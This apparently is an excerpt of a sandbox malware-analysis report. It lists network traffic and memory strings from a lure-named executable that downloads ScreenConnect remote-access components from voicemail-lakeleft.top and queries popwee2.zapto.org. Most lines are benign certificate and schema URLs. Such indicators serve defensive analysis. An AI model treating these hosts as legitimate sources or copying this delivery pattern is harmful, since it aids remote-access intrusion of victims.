                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: voicemail-lakeleft.top
                  Source: global trafficDNS traffic detected: DNS query: popwee2.zapto.org
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288974321.0000021CA2782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288974321.0000021CA2782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000007.00000002.3289021215.0000021CA2E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288225105.0000021CA1EEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3289640492.0000021CA2EA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbA
                  Source: svchost.exe, 00000007.00000002.3289318932.0000021CA2E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: svchost.exe, 00000007.00000002.3289536686.0000021CA2E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbiuk
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000006.00000002.3290128804.0000016BAB800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: monthly-eStatementForum120478962.Client.exe, 00000000.00000002.2258446760.0000000000B9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DiN;
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000002.00000002.2983442666.0000025D39651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabA
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enS
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-8
                  Source: svchost.exe, 00000007.00000002.3289318932.0000021CA2E67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261953999.0000021CA2E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2230100183.0000021CA2708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
                  Source: svchost.exe, 00000007.00000003.2247242925.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2211022757.0000021CA270F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180029091.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2247172340.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159753613.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230521797.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230497548.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261678290.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288647499.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180103259.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195977302.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261895175.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230100183.0000021CA2708000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159831592.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2210994178.0000021CA2707000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159724549.0000021CA270E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA
                  Source: svchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdware
                  Source: svchost.exe, 00000007.00000003.2120640258.0000021CA2E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2210994178.0000021CA2707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
                  Source: svchost.exe, 00000007.00000003.2247242925.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2211022757.0000021CA270F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180029091.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2247172340.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159753613.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230521797.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230497548.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261678290.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288647499.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180103259.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195977302.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261895175.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230100183.0000021CA2708000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159831592.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2210994178.0000021CA2707000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159724549.0000021CA270E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdware
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/28
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: dfsvc.exe, 00000002.00000002.2981098182.0000025D365DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35E86000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                  Source: dfsvc.exe, 00000002.00000002.2982604639.0000025D395A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000007.00000002.3289021215.0000021CA2E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287754329.0000021CA1E81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288225105.0000021CA1EEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3289318932.0000021CA2E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyc
                  Source: svchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc.com
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scr
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
                  Source: svchost.exe, 00000007.00000002.3288119180.0000021CA1ED3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustf1p
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D6CA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.3289893133.0000000001FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://voicemail-lakeleft.top
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: monthly-eStatementForum120478962.Client.exe, 00000000.00000002.2258446760.0000000000B9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/I
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DCB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DCD6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DD3C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DCB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806014
                  Source: svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
